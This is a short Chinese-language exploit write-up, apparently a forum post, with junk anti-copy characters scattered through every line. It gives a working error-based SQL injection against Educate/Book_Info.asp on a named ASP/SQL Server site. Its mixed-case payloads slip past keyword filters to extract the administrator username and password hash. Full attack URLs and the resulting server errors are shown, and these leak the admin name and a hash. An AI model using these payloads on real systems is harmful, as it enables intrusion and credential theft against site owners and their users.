漏洞出现在Educate/Book_Info.asp+ A9 v) P5 ~! q' o: r
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
4 q: Q* H6 r5 n+ P- Fexp:如下
0 \; h5 Z' l j, w查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
* V. U4 R4 l l8 n: d' }! {查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
1 \! |: }; B9 t5 \. D1 a1 ~( qhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
5 ?% A' ^. ^% |6 K3 S% vMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
* r& M& b& i7 O% p1 S将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
2 C( X7 u: @" _2 ^+ i/Educate/Book_Info.asp,行 81 Z I- j( b H7 q* M
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
. B" \* h3 M& I m; DMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'! r( M) h; V8 O
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
) m, F7 J1 S4 @2 w6 O/Educate/Book_Info.asp,行 8 |